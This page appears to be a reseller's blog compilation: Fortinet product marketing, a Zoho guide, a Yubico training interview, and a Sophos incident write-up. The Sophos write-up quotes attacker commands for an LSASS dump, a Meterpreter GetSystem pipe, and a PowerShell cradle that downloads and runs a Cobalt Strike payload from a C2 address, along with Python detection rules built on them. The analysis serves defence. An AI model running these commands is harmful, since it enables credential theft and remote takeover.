Fortinet Secures the Intelligent Enterprise Running SAP

SAP is among the world’s largest software companies, with some 92% of the Forbes Global 2000 using at least some of its enterprise application solutions. Most of these companies will deploy SAP S/4HANA in the cloud—either public or private. In fact, by 2027 some SAP customers will need to migrate to SAP S/4HANA, as SAP has announced the end-of-life of older versions of its integrated application solutions (SAP Business Suite). Fortinet’s Dynamic Cloud Security offerings provide organizations the key security elements they require to help secure their SAP S/4HANA cloud deployments during this transition.

Securing SAP Environments With Fortinet’s Dynamic Cloud Security

Properly securing any enterprise application solution, such as Enterprise Resource Planning (ERP), is increasingly important for organizations. SAP Enterprise application solutions are a suite of integrated tools used to collect, store, manage, and interpret data from many business activities. For management teams, ERP is the key to understanding and managing their business. But for cybercriminals, ERP systems are an attractive target because ERP systems share data across every facet of the organization. 

Fortinet has been working with leading ERP vendors of enterprise application solutions to provide carefully engineered and well-tested architectures for securing such systems, both in and out of the cloud. For example, Fortinet has recently published Oracle validated security architectures for Oracle solutions. Fortinet’s Dynamic Cloud Security portfolio is designed to help SAP customers secure their workloads across environments. 

“Zuellig Pharma uses Fortinet’s Dynamic Cloud Security offerings to protect our SAP deployments across public and private cloud infrastructures,” shared Daniel Laverick, Head of SAP & IT Solutions at Zuellig Pharma. “Fortinet offers the broadest set of security offerings for securing workloads both on-premises and on any cloud. With Fortinet, we’ve gained unified visibility and control without hindering our ability to deliver seamless user experience to our customers worldwide.” 

Securely Transitioning to SAP S/4HANA

A few years ago, SAP announced end-of-support for older SAP solutions by 2025, including:

  • ERP 6.0
  • Customer Relationship Management 7.0
  • Supply Chain Management 7.0
  • Supplier Relationship Management 7.0 applications
  • Business Suite powered by SAP HANA

S/4HANA was specifically designed to run in a virtualized environment like the cloud. But not all clouds are the same. As a result, there are actually different versions of the software designed for public and private cloud deployments. In many cases, customers will opt for a hybrid model, where the majority of SAP systems run in the cloud while some dedicated production systems remain on-premises. This can add complexity in terms of security across these deployments. Fortunately, Fortinet solutions support both public and private clouds, ensuring security for hybrid, multi-cloud, and on-premises environments.

“Fortinet’s Dynamic Cloud Security portfolio—including FortiWeb and FortiCWP—enables our customers to confidently secure their SAP data and applications,” shared Thomas Grimm, CEO at AddOn AG – Germany. “Through Fortinet, SAP workloads are protected consistently across the application, network, and platform stack, addressing the expanded attack surface with a consistent offering.”

Christian Steden, Managing Director at Evonet said, “As a Fortinet partner, Evonet provides our customers Fortinet’s broad range of advanced security technologies to protect their SAP deployments. Fortinet’s offerings natively integrate with SAP, enabling automated, centralized management and visibility that reduces management overhead for our customers.”

Addressing the ERP Threat Landscape with Fortinet’s Dynamic Cloud Security

ERP systems can be a target for bad actors as they provide access to a vast range of business information systems, including financial data, production systems, development, employee data, and more. Some of these attacks could be aimed at well-known SAP apps such as Fiori—S/4HANA’s web interface, the new user experience (UX) for SAP software and applications. It provides access to a set of applications that are used in regular business functions, like work approvals, financial apps, calculation apps, and various self-service apps. For organizations looking to enhance the security for their SAP deployments, Fortinet’s Dynamic Cloud security offerings provide visibility and control across cloud infrastructures, ensuring secure connectivity from the data center to the cloud. 

Consider the following to enhance the security for SAP deployments:

  1. A web-application firewall (WAF) to block web attacks, such as code injection, cross-site scripting, or SQL injection. Because these attacks may be based on zero-day threats, the WAF should utilize machine learning to differentiate between normal and abnormal traffic and should utilize sandboxing and AI-driven threat feeds to detect new attack types. The WAF should also secure API interfaces using API calls. 
  2. Cloud-based network firewalls to secure network traffic—including internal segmentation to reduce the extent of trust domains. In a zero-trust environment, all traffic should be encrypted; however, doing so may introduce performance issues—so firewall performance will be a key attribute.
  3. An IPS (Intrusion Prevention System) to block attacks targeting system vulnerabilities.
  4. Data Loss Prevention tools to block sensitive or confidential information leakage.
  5. Cloud-native workload protection and/or CASB to monitor security policies, configuration, usage patterns, and compliance with security policies.

In addition to the above, endpoint protection, network access controls, central management, and centralized analytics should all be part of the security infrastructure if not already. In fact, the pillars of cybersecurity need to be brought into play—Security-Driven Networking for segmentation and securing data, Zero Trust Access (including endpoint security) to protect against identity theft-driven attacks, cloud security to secure data in the cloud and to identify misconfiguration and risk factors, and robust AI-Driven Security Operations to ensure timely threat feeds and remediation. Of course, all these should be woven into a broad, integrated, and automated cybersecurity platform, like the Fortinet Security Fabric, supported by a shared analytics and management plane.

Fortinet Can Help

Fortinet Dynamic Cloud Security Solutions can provide the necessary visibility and control across cloud infrastructures, enabling secure applications and connectivity from data center to cloud.

Fortinet recently published a white paper on securing SAP deployments detailing the tools and architecture approach for different scenarios. Learn more about how to enhance the security for your SAP S/4HANA deployment by downloading the paper.

Learn how Fortinet’s dynamic cloud security solutions provide increased visibility and control across cloud infrastructures, enabling secure applications and connectivity from data center to cloud. 

Read these customer case studies to see how Hillsborough Community College and WeLab implement Fortinet’s dynamic cloud security solutions for secure connectivity from data center to the cloud. 

Engage in our Fortinet user community (Fuse). Share ideas and feedback, learn more about our products and technology, or connect with peers.

As Fortinet partners, Net Universe offers all Fortinet devices and subscriptions with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/fortinet.

An active adversary caught in the act – Sophos News

Customer profile: A professional sports organization based in the USA, with approximately 800 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.

The initial clue: A needle among the hay

In the hunt for suspicious events, the Sophos MTR team analyzes tens of millions of data points each day by leveraging threat intelligence, machine learning, and complex rule sets derived from the front-line experience that operators have gained from responding to threats day in, day out. This analysis is done with the goal of finding signals that could potentially be an indicator of an attack.

In this case, the signal was a legitimate Microsoft Sysinternals tool: ProcDump.exe, a tool typically used by developers to analyze running software processes and to write (or ‘dump’) their memory to disk so that it can be inspected. Developers find this tool very handy for figuring out why a bug is occurring.

Yet in this instance, ProcDump was attempting to export the memory space of lsass.exe. This raised alarm bells with the Sophos MTR operations team which monitors the customer environment 24/7.

LSASS is the Local Security Authority Subsystem Service in Microsoft Windows and it is responsible for enforcing security policy and handling logins to Windows systems. If one were to write its memory to disk, the usernames and passwords of users could be retrieved from it.

The Sophos MTR team had indeed spotted an indicator of attack. Someone was trying to steal credentials.

You may have heard of Mimikatz, a tool whose sole purpose is for stealing passwords, hashes, security tokens, and so on. Adversaries sometimes avoid using this tool given its widespread detection by security products. But unlike Mimikatz, ProcDump has legitimate uses beyond just the nefarious, and thus is rarely detected by security vendors.

Someone was trying to not get caught.

The investigation begins

A case was created the same minute as the signal was generated, and a Sophos MTR operator immediately began to investigate.

Attempted credential theft

The operator looked into the historic data gathered by our agent and found the process that caused the detection. The process was trying to invoke a command:

C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"

The command shows the Windows command-line interpreter cmd.exe attempting to use WMIC – the interface for Windows Management Instrumentation. WMI is a tool for interacting with local and remote systems to get information and send them instructions.

Calling out to a remote server (redacted to SERVER NAME), the command was trying to tell the server to run ProcDump and write the LSASS process’ memory to disk.

Thankfully the MTR operator found no evidence that “lsass.dmp” was written to disk, and a review of their Sophos Central telemetry showed Sophos credential theft prevention technology successfully thwarted the adversary’s attempt.

But where did this command come from?

Attempted privilege escalation

The operator looked back up the process tree to find the parent of (i.e. what started) cmd.exe and found svchost.exe – the Windows Service Host that is used to run single processes and conserve computing resources.

The same instance of svchost also spawned another child process:

C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7

To the untrained eye, the above command doesn’t appear obviously malicious. Yet this is a common artifact that can be observed from the GetSystem function of Meterpreter.

The Meterpreter is a payload that gives an adversary interactive command-line access to a host and GetSystem is a script built into the Meterpreter that aids an adversary in gaining full system privileges by impersonating a named pipe – a technology to enable processes to communicate with one another.

Thankfully the named pipe they were trying to exploit didn’t exist on the system at that time.

Command and control

Knowing that the adversary was using the Meterpreter indicated that they must have some kind of network connection to remotely send their commands to the compromised host.

Digging into the network logs, the MTR operator could see a large number of outbound connections to Bulgarian IP address 217.12.202.89 using the network port 443.

Port 443 is typically used by HTTPS for securely connecting to websites, and adversaries commonly use this port to hide themselves among legitimate web traffic.

This discovery initiated a review of this Bulgarian-based IP. One of the ports it had open to the internet is port 50050. This port is an ephemeral port – one that cannot be registered with IANA and thus is not a common port used by well-known network services. However, the MTR operator had seen this port many times before.

Port 50050 is the default listening port for a Cobalt Strike listening server. Cobalt Strike is a “threat emulation” tool typically marketed to penetration testers to easily facilitate adversarial attacks and help organizations see their risk to breaches.

However, malicious threat actors have gotten their hands on this tool and use it to orchestrate real attacks on innocent victims.

Notifying the customer

Only minutes after the initial detection was made, the MTR operator completed the initial investigation and had high confidence that this was malicious adversarial activity.

Sophos MTR offers three modes of response to customers that they can switch between at any time:

Notify – Sophos conducts threat identification and investigation, informing the customer of the findings and offering the customer recommendations for how to respond to the threat themselves.

Collaborate – Sophos conducts threat identification and investigation, and collaborates on the response to the threat, dividing responsibility between the customer and the Sophos MTR team.

Authorize – Sophos conducts threat identification, investigation, and response and takes proactive action, informing the customer about what was detected and the response actions that were taken.

In this instance, the MTR customer was in Notify mode. The operator reached out to the customer via phone to discuss the discovery and to provide recommendations for how to respond to the immediate findings before the investigation continued.

The MTR operator shared the discoveries and the user accounts leveraged by the adversary. These accounts needed their passwords reset immediately to disable the adversary’s access. In addition to the phone call, all the details were provided in an email to be referenced while the customer took action.

Continuing the hunt

With the customer working on resetting the compromised accounts’ passwords, the MTR operator continued to follow the adversary’s journey across the customer’s network. At this point, no evidence had been found as to how they got inside.

Note that throughout the rest of this case, regular communication between the MTR operator and the customer took place via email.

Lurking in the cloud

Deeper analysis of the network traffic on the compromised host showed HTTPS traffic between the host and another that resided in the customer’s virtual private cloud (VPC), where they have a number of servers that face the public internet.

Diving into the logs of the server in the VPC, the MTR operator quickly spotted further GetSystem attempts and named pipe impersonation. However, all evidence pointed towards the already identified compromised hosts.

Additionally, a PowerShell (a scripting language built into Windows for use with task automation) command execution was identified:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh'))"

This one-line command reaches out to a URL and downloads and executes a payload it finds there. The URL points to the same Bulgarian IP where the MTR team found the open ports for Cobalt Strike.
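The three command lines quoted in this case (the WMIC-launched ProcDump of LSASS, the GetSystem named-pipe echo, and the hidden PowerShell download cradle) can be hunted for in process-creation telemetry. The following is an added example, not Sophos code: the rule names, the event layout and the host names are assumptions made for illustration, and the two malicious command lines and the C2 address are the ones given in this write-up.

```python
import re

# Behavioural rules derived from the command lines quoted in this case.
# They key on what the command does, not on the random pipe name or the
# payload path, which change from one intrusion to the next.
RULES = {
    # ProcDump (any flags) with lsass as the dump target.
    "procdump_lsass": re.compile(
        r"procdump(?:64)?(?:\.exe)?[\"']?\s.*\blsass\b", re.I),
    # WMIC creating a process on a remote node.
    "wmic_remote_process_create": re.compile(
        r"\bwmic(?:\.exe)?[\"']?\s.*/node:\s*\S+.*\bprocess\s+call\s+create\b",
        re.I),
    # cmd.exe echoing a token into a named pipe (GetSystem artifact).
    "getsystem_named_pipe_echo": re.compile(
        r"\bcmd(?:\.exe)?[\"']?\s+/c\s+echo\s+\w+\s*>\s*\\\\\.\\pipe\\\w+",
        re.I),
    # Hidden-window PowerShell that downloads a string and executes it.
    "powershell_download_cradle": re.compile(
        r"powershell(?:\.exe)?[\"']?\s.*-w(?:in(?:dowstyle)?)?\s+hidden\b"
        r".*\b(?:iex|invoke-expression)\b.*downloadstring\s*\(", re.I),
}

# C2 address listed in this article's IOAs / IOCs.
KNOWN_C2 = {"217.12.202.89"}

URL_HOST = re.compile(r"https?://([^/:\s'\"]+)", re.I)


def match_rules(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(events):
    """Return one finding per event that matches at least one rule."""
    findings = []
    for ev in events:
        rules = match_rules(ev["cmdline"])
        if not rules:
            continue
        hosts = URL_HOST.findall(ev["cmdline"])
        findings.append({
            "host": ev["host"],
            "rules": rules,
            "known_c2": [h for h in hosts if h in KNOWN_C2],
        })
    return findings


# Constructed sample telemetry: host names are hypothetical; the three
# malicious command lines are those quoted in the article, the remaining
# three are benign controls written for this example.
SAMPLE_EVENTS = [
    {"host": "HOST-A", "cmdline":
        r'''C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"'''},
    {"host": "HOST-A", "cmdline":
        r'''C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7'''},
    {"host": "VPC-SRV-1", "cmdline":
        r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh'))"'''},
    {"host": "DEV-1", "cmdline":
        r'''C:\Tools\procdump.exe -accepteula -ma w3wp.exe C:\dumps\w3wp.dmp'''},
    {"host": "DEV-1", "cmdline":
        r'''C:\Windows\system32\cmd.exe /c echo done > C:\Temp\build.log'''},
    {"host": "OPS-1", "cmdline":
        r'''powershell.exe -NoProfile -File C:\Scripts\backup.ps1'''},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The benign controls show why the rules require the combination of tool and target: ProcDump against another process, an echo redirected to a file, and a scripted PowerShell job all pass without a finding.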

SophosLabs

The MTR operator quickly reached out to SophosLabs, Sophos’ threat analysis, intelligence, and research division. Sharing the above command, the MTR operator asked for assistance with analyzing the payload hosted at that URL. Within a few minutes, SophosLabs shared their insights back with Sophos MTR.

Unfortunately, the payload in question was no longer present: seemingly taken down by the adversary shortly after they used it. SophosLabs promptly added the IP and the URL to the cloud intelligence platform that underpins all Sophos products and services so that any further use of that command and control server will be detected and blocked across all Sophos customers.

Finding the initial access

Finally, the MTR operator identified where the attack began. Continuing the analysis of the VPC server’s network logs, Remote Desktop Protocol (RDP) communication to an unknown host was spotted within the VPC. This unknown host was not under management by Sophos MTR, nor could it be found in the customer’s Sophos Central account.

The operator reached out to the customer to ask what this unknown host was and why it wasn’t under management.

It seems they decommissioned it too late. The adversary had laterally moved from the original compromised host to another and executed the PowerShell command. This gave them remote access to a new host in the event they lost their access via RDP.

This turned out to be a smart move by the adversary, as this is exactly what happened.

RDP servers far too often face the public internet, making them a prime target of adversaries looking to break into networks. Once inside, RDP is a noisy and visual method of having remote access. Moving cursors on the screen are somewhat of a giveaway.

The first thing an adversary will look to do is to move laterally, to another host, and install a reverse shell – a way to have that host call back to them and give them command line access. Using the command line is a far more stealthy method of remote access, allowing them to hide in the background even while a user is logged in and using the host.

As to what the adversary’s goals were, these are unknown. The MTR operators identified the attacker long before they were able to act on their objectives, catching them while they were still in the network propagation stages, laterally moving and attempting to escalate their privileges.

Following the investigation, the MTR operators continued to monitor the customer’s estate for this specific threat for seven more days, identifying no further malicious or suspicious activity.

The MTR team then concluded that the adversary had been successfully ejected from the network.

Case closed. On to the next.

Learn more

For more information on the Sophos MTR service, visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts, Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.

IOAs / IOCs

  • ProcDump of LSASS: C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"
  • Meterpreter GetSystem: C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7
  • C2 IPv4: 217.12.202.89
  • C2 payload URL: http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh
  • C2 port (Cobalt Strike): 50050
  • PowerShell to download and invoke Cobalt Strike payload: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://217.12.202.89:80/axdfcvgfdfgyhnhgvcdfvghjh'))"

Net Universe offers all Sophos devices and subscriptions, as well as consultant services, with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.

Fortinet Announces New Secure SD-WAN Appliance for Large & Complex WAN Deployments

FortiGate 200F Delivers Faster ROI Benefits and High Security Compute Ratings, Expands F-series Product Portfolio Powered by Purpose-built SD-WAN ASIC

“Change is the only constant in life.” – Heraclitus, Greek philosopher 

If anything, 2020 has been a year of change. Over the last 9 months, I have had an opportunity to interact with hundreds of customers – and “change” was the common thread connecting them all. Every organization irrespective of their business vertical or segment is undergoing a transformational change whether it’s an evolving business model, having to adapt to a largely remote workforce, or newer IT initiatives with WAN Edge at the center. At Fortinet, change is not resisted, we embrace change to solve the unmet and unarticulated needs of our customers. 

Expanding the Fortinet Secure SD-WAN F-series Product Portfolio 

Fortinet’s SD-WAN journey began years ago, led with a security-driven networking approach that enabled us to deliver the industry’s first Secure SD-WAN solution. We have continued to innovate since then, delivering the industry’s first purpose-built processor designed to accelerate SD-WAN functionality without compromising on security performance, and offering a fully self-healing SD-WAN solution combined with centralized orchestration to meet the diverse needs of global customers. We’ve had tremendous success with our FortiGate F-series product portfolio, which is powered by a purpose-built SD-WAN processor. Over the years, we have continued to expand the F-series portfolio to meet changing customer requirements and deployment needs at every edge with multiple variants from built-in LTE, wireless, POE and most recently built-in bypass to deliver reliable connectivity during planned or unplanned outages. 

The FortiGate 200F – The Newest Addition to the FortiGate F-series Portfolio 

Today, we are excited to launch the FortiGate 200F, powered by Fortinet’s purpose-built SD-WAN processor in a 1RU form factor with 10GE-interface support to expand the fast-growing FortiGate F-series product portfolio. The FortiGate 200F series continues to leverage our successful security-driven networking approach to deliver a simple, scalable, and flexible Secure SD-WAN solution that customers can deploy across the home, branch, campus and multi-cloud to achieve faster ROI benefits. The FortiGate 200F is ideal for large complex SD-WAN deployments to meet high performance and scalability requirements for mid-size to large enterprises deploying at the campus or enterprise branch level. 

If you are wondering if the FortiGate 200F meets the high-performance needs for your large global WAN deployment, the answer is most likely “yes!” FortiGate 200F delivers high Security Compute Ratings, a benchmark that compares the performance of Fortinet’s purpose-built ASIC-based product portfolio to other SD-WAN and NGFW vendors in that same price range that utilize generic CPUs for networking and security capabilities. The FortiGate 200F powered by a purpose-built SD-WAN processor enables the following Security Compute Ratings:

We believe that this new product addition will help further accelerate our Secure SD-WAN momentum and help our customers achieve digital transformation at all edges.

Learn more about the FortiGate 200F and all Fortinet Secure SD-WAN appliances.


Remote work and efficient file management

Remote work, once a privilege given to few, is now a viable alternative to the commute and grind of office life. As of June this year, an estimated 42% of the US labor force reported that they were working from home full-time, the highest it’s ever been. But as more and more businesses embrace remote work, a bigger question remains: what is the best way to boost collaboration between remote teams? 

Zoho Workplace for remote work

For most companies, the answer has been to use cloud-based file sharing and document management platforms. Cloud-based platforms, as a whole, are a godsend for remote workers, because they’re compatible on any computer, tablet, or smartphone, and can be accessed from literally anywhere. Massive enhancements and developments in cloud security over the last few years make this an even better option for businesses. However, when workers operate on different systems, the ability to collaborate, share, and interact becomes far more complicated.

For example, Google cloud-based servers require users to have a Gmail address. This means that your company email provider must be Google, unless workers log in from their personal email. Documents saved on Excel must be converted to Numbers if being sent to a MacBook using iWork. While so many businesses love cloud storage, many more complain about the lack of compatibility.

 In this guide, we’ll discuss the office suite applications of Zoho Workplace – Zoho Writer, Zoho Sheet, and Zoho Show, and why they’re great alternatives to other more cumbersome platforms. Ensuring your entire team uses Zoho for their collaborative efforts will minimize mix-ups and technical difficulties, and encourage collaboration with their easy-to-use design and functionality.

Furthermore, if your team uses Zoho, your data is guaranteed never to be sold to third parties for profit.

Zoho Writer—in your own words but better  

 Zoho Writer is the perfect platform to create text documents and easily share feedback in real time. One of its unique selling points is that it removes the toolbar function as writers are typing, allowing them to focus completely on the words in front of them. This “distraction-free” design helps workers stay on the task at hand. 

Writer is also equipped with aids to help you get the most out of your writing. The platform will give you a score based on your spelling, grammar, and several other important but often ignored criteria.

 The level of readability and style are scored based on the amount of run-on sentences present in a document. The checker also looks out for the overuse of polysyllabic words, and gives users their average sentence length. This is a great option for anyone who’s managing a remote team that’s brilliant, but also not exactly Shakespearian.

Zoho Writer makes it easy for businesses to achieve continuous integration, or the organic collaboration between cross-functional teams, through ensuring software is delivered painlessly, with no downtime during deployments.

The app can also be used in any browser, and document sharing is compatible with Google Drive, iCloud, Dropbox, and even WordPress. And the platform comes with all the benefits found in an application like Microsoft Word, such as easy-to-use templates and digital signatures. 

One of the advantages of sharing files using Writer is that the document can be collaborated on, even by the people outside of the organization. In case you are conducting an interview, the interview candidate can be given a link to a test with edit access, as a password-protected file, with an expiry date and time. Once their time is up, the external link will automatically become inaccessible and the reviewer can check the trail of the file and go through the answers. Sharing using the candidate’s email address also ensures that the test is taken only by the intended participant. This feature can be further extended for co-authoring books, creating collaborative reports and so on.

Zoho Show—taking your slides to the next level   

Zoho Show is one of the most impressive apps found on Zoho—it’s a show-stealer, if you will. Zoho Show allows users to create powerful slide presentations with the ability to share via a URL. Collaborators can also comment on the document and track changes through the history function.

The slideshow platform allows presenters to create impressive animations. But perhaps the best feature is the function that allows users to record their presentations as if they were being virtually done live. This way, remote presenters can focus their energy on Q&A sessions while they can rest assured that their presentation is flawless.

The presentation can be published as well as broadcast in real time, and can be made accessible to non-members of the organization. 

Zoho Sheet—more data with less work  

Zoho Sheet lets you create spreadsheets, but with an added feature called Zia Insights that can convert your data instantly and automatically into pie charts and other graphics that add a bit of visual zest and readability to your data. It’s a great way to impress your boss, especially if they’re only used to Excel. There are also over three hundred and fifty built-in formulas, as well as the ability to create your own custom functions.

You can even program Zoho Sheet to retrieve data from Zoho Mail, Books, and many other Zoho apps. The seamless sharing and collaboration that can be achieved through Zoho means your workers only need a secure, stable internet connection to get the job done. A good rule is to make sure your internet can transmit at least 25 Mbps in order for data to travel fast enough and avoid lag issues.

And to add another layer of seamless collaboration to the mix, you can use Zoho Cliq to chat with colleagues and stakeholders, on top of the real-time data collaboration you get from Sheet. 

WorkDrive  

WorkDrive integrates all three of these collaboration apps, and acts as a single home for all of your office files. You can create your files in a team, group, or personal folder depending on your needs. Having a document in a Team Folder also allows you to control when your file is ready for the rest of the team and what level of access each member can have.

Conclusion  

When it comes to remote work, nothing is more important than staying in sync. Don’t waste valuable time dealing with technical difficulties, hard-to-use platforms, or incompatible devices. Adopt a platform that’s easy to use so you can focus on doing what you need to do for the success of your business.

Author bio: Gary Stevens

Gary Stevens is the CTO of Hosting Canada, a website that provides expert reviews on hosting services and helps readers build online businesses and blogs.

Net Universe offers all Zoho subscriptions and consultant services with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/zoho.

Improve your company’s cyber security training with top tips from a behavioral researcher

Today marks the final stretch of National Cyber Security Awareness Month (NCSAM), and for the final week, we decided to sit down with Sal Aurigemma, PhD, Associate Professor of Computer Information Systems at the University of Tulsa, to get his take on enterprise security training. 

As with many other things that have been impacted by COVID, enterprise security training is no different. Many organizations are heavily reliant on training and preparedness programs at the moment to help employees navigate the adoption of new technologies and processes, as well as mitigate threats from the rising number of phishing and man-in-the-middle attacks. But just how effective are these programs, and are they actually influencing user behavior? We’ll find out. 

Dr. Aurigemma has more than 20 years of experience in the information technology industry as both an educator and behavioral researcher. Dozens of students come through Dr. Aurigemma’s undergraduate and masters programs each year to learn about proper cyber security hygiene using tools like the YubiKey, and he’s explored topics related to security policy compliance and end-user security practices in his research over the years. 

What is the biggest problem you see with employee training programs today?

Perhaps the most frustrating problem I see in the organizations I have worked for, and those I work with today, is a pervasive “check-box” approach to information security awareness training. By this I mean one of two things, and often both:  

1) It is still somewhat treated as a one-and-done compliance checklist that is completed on an annual or quarterly basis. With the possible exception of anti-phishing testing where organizations use tools and services to run their own phishing campaigns, there is little to no reinforcement of the reason behind why it’s important to safeguard the organization. 

2) A one-size-fits-all training doesn’t work. We know that we have certain sectors of our workforce that are more likely to be targeted by potential adversaries. Yet, in many cases, the training given across the workforce is largely the same, even though the threat and techniques can vary based upon the target. 

What are three things organizations can do to improve the efficacy of their cyber security training programs?

My number one recommendation is the hardest to achieve – make sure that your infosec awareness training is properly resourced. This means that you have enough people running the program and those people are properly trained to create and administer effective training programs. If your organization treats security training as a collateral duty, do not be surprised when it fails to meet expectations.

Secondly, ditch the one-size-fits-all approach, at least when it comes to security training and attention. We know certain groups of employees are targeted more often than others, or targeted in different ways, so we need to prepare them accordingly. For example, senior executives, IT system administrators, and HR team members are the top three target populations, and they are typically targeted using different techniques. Their training should reflect that. The same goes for different employee demographics — the lessons or examples that are most impactful for one group of employees may be very different for others.  

Finally, I would recommend that every organization develop a set of training outcome metrics and then use them to continually assess and improve its training programs. This can be challenging, but it is worth the effort. If you have certain employees or employee groups that keep “failing” some aspect of your training, that is a sign that your training and/or security mitigations are not sufficient. But you won’t know that unless you measure and monitor.  

How do you foresee the influx of remote work, spurred by COVID, impacting the approach to cyber security training? How should organizations adjust and what should they consider that maybe they haven’t before? 

My primary fear is that the increase in remote work will further distance employees from the security training staff and the messages they bring. What we don’t want is more “watch this video to complete your training” requirements that replace impactful interactions with the organization’s security staff (whether face-to-face or virtual). 

Given that the work-from-home movement is here for a while, or possibly here to stay for some organizations, it is somewhat critical to do a complete review of your security training needs and develop a plan to adjust accordingly. For example, does your current security training plan account for the significantly greater emphasis on remote connectivity and interactions, and the increasing threats — like phishing and man-in-the-middle attacks — that come with that? Do your employees understand which threats are now more prevalent or dangerous than before because of the extension of the workplace to their home office network? 

In an ideal world, this shift to remote work would be the catalyst organizations need to embrace a more tailored security awareness training approach that accounts for an employee’s job role, location, access, experience level, and other demographic characteristics. If and when we return to a more normal workplace life, we will be better positioned to continue to adapt and improve our security awareness programs.

Not all employees will follow through with best practices, even with a perfect training program. What are the primary factors that inhibit users from adopting new security technologies or practices?

A significant portion of my research activities are focused on better understanding inhibitors and facilitators of sound security behaviors, and if I had to narrow it down to three potential reasons why people do not take security actions, even when they know they should, I would say it is due to:  

1) Threat apathy 

2) Response efficacy

3) Inconvenience

Threat apathy occurs when individuals do not pay attention to security because they do not consider the recommended or required security action (and its related threat) to be important. It could be because they don’t feel important enough to be a target of cybercriminals, or that they believe their online accounts aren’t worth stealing. Overcoming threat apathy requires the use of convincing and compelling security messaging that explains why the action is important, on a personal and organizational level, and the potential consequences of failure.  

Response efficacy is an academic way of saying that people may not know enough about, or have confidence in, a particular recommended security action. A great example of this is two-factor authentication (2FA). It is not a secret that we should use 2FA wherever and whenever we can. However, most people don’t know the differences between the various types of 2FA mechanisms, which ones are more secure than others, or how they work. Security training programs should not just articulate the threat and required security actions; they must also make it clear that the requested actions are sufficient to the task and, to some extent, explain how.  

Inconvenience is a real factor that influences our security behaviors.  As humans, we are constantly calculating the costs and benefits of doing things and we generally know what happens when the costs outweigh the benefits. Enterprises have to design and implement security mitigations with this in mind and work to balance maximizing the security benefit while minimizing or eliminating the inconvenience factor. If we don’t design security mitigations with the end-user in mind, the end-user may find ways to avoid or diminish the effectiveness of those mitigations.

On the contrary, what have you observed to be primary motivators for adopting new security technologies or practices?  

One of the latest research trends in behavioral information security that I feel strongly about is a shift from sanction or threat-based compliance to one that adds positive reinforcement and messaging. By this I mean that many security policies and training programs are focused on “compliance-or-else” messaging. In short, employees have something to fear if they don’t follow the rules. Fear-uncertainty-doubt (FUD) is used too much in the cyber security literature and it also lives in our training programs. 

While I do believe that there needs to be some actual consequences for willful and malicious non-compliance with security rules, we also know that fear alone is not a good enough motivator. We see that in many aspects of modern society, not just in cyber security. My fellow researchers and I have conducted numerous experiments that show that building up and emphasizing the positive psychological capabilities of end-users to combat a security threat is significantly more effective than relying on fear and promises of reprisal alone. We have found that end-users are much more likely to adopt new security technologies and practices when they feel: 

1) More capable of taking security actions and working through issues related to the required tasks 

2) More hopeful that their actions are effective

3) More optimistic about their resulting security posture

It’s impossible to eliminate the element of human error, especially when it comes to protection against sophisticated phishing or man-in-the-middle attacks, so what other steps should organizations be taking — outside of training — to ensure they have a comprehensive approach to security?

In my opinion, the best way to minimize the effect of human error (or conscious rebellion) on security practices is to reduce the opportunities to make bad decisions.  This means designing your security mitigations in a way that reduces the cognitive load and choices your end-users have to make.  

A perfect example of this is having your employees use YubiKeys for 2FA or passwordless login. At a time when phishing attacks are virtually undetectable — even to the most well-trained eye — this is exactly the type of technology that you should be using to support your training initiatives. But make sure that the burden of configuring the YubiKeys does not fall all on the end-user and make sure that you are using the right form factor for the employee’s electronic devices.  

Likewise, you don’t want your employees or end-users choosing passwords that are weak or previously compromised. But, don’t put the onus on the end-user to know what that means – do it for them when you are registering accounts or during password changes. Offloading as many volitional security activities as possible from your end-users and limiting the opportunities to deviate from strong security practices should be primary considerations for every security activity.  

Learn more about how the YubiKey can complement your organization’s cyber security training endeavors with a fool-proof 2FA solution proven to eliminate account takeovers from phishing and man-in-the-middle attacks. 

Net Universe offers all Yubikeys with worldwide Delivery Services.
Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/yubikey.
You can visit our Shop Online

 

Tips to improve remote communication and collaboration



With remote working conditions, your employees may find it difficult to interact and communicate with their colleagues. If this goes unchecked by your organization, they may develop a sense of loneliness and isolation, which in turn may lead to loss of employee morale and engagement.


To combat this, organize frequent virtual meetings and conversations between your employees. Need a starting point? Here are some ways to improve remote communication and collaboration in your organization:

  • Run virtual meetings regularly to help employees work as a team and generate new ideas. Choose the right meeting tool and allot time for casual chitchat.

  • Make your employees aware of all the communication channels available to them.

  • Educate your managers on how to improve communication among their team members.

  • Encourage a 360-degree feedback system that supports employee recognition and helps employees understand their performance from different perspectives.

  • Use virtual idea boards to keep all your employees on the same page.

